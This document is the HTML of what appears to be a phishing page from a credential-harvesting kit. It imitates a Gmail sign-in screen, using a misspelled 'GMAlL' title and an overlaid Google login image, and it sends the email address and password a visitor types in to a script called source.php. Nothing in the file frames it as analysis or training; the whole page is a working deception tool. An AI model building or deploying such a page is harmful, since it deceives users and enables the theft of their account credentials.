<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- saved from url=(0014)about:internet -->
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>GMAlL SIGN IN</title>
<meta name="GENERATOR" content="DUDU">
<meta name="DUDU" content="DUDU">
<style type="text/css">
body
{
   background-color: #FFFFFF;
   color: #000000;
}
</style>
<style type="text/css">
a:hover
{
   color: #6CDA7B;
}
</style>
<!--[if lt IE 7]>
<style type="text/css">
   img { behavior: url("pngfix.htc"); }
</style>
<![endif]-->
</head>
<body>
<div id="bv_Image1" style="margin:0;padding:0;position:absolute;left:0px;top:0px;width:421px;height:509px;text-align:left;z-index:3;">
<img src="cdn/GG1.png" id="Image1"   width="421" height="509" align="top" border="0"></div>

<div id="bv_Form1" style="position:absolute;left:0px;top:0px;width:401px;height:400px;z-index:4">
<form name="Form1" method="post" action="source.php">

<input id="provider" name="provider" value="Google" type="hidden">

<input id="email" style="position:absolute;left:113px;top:250px;width:182px;height:26px; padding: 1px; border:1px #C0C0C0 solid;font-family:Arial;font-size:14px;z-index:0" name="email" pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,3}$"  type="email" required placeholder="Email">

<input id="password" style="position:absolute;left:113px;top:288px;width:182px;height:26px;padding: 1px; border:1px #C0C0C0 solid;font-family:Arial;font-size:14px;z-index:1" name="password"  type="password" required placeholder="Password">

<div id="formimage1" style="position:absolute; left:112px; top:324px; z-index:2">
<input name="formimage1" src="cdn/ggb.png" width="189" type="image" height="26">
</div>
</form>
</div>
</body></html>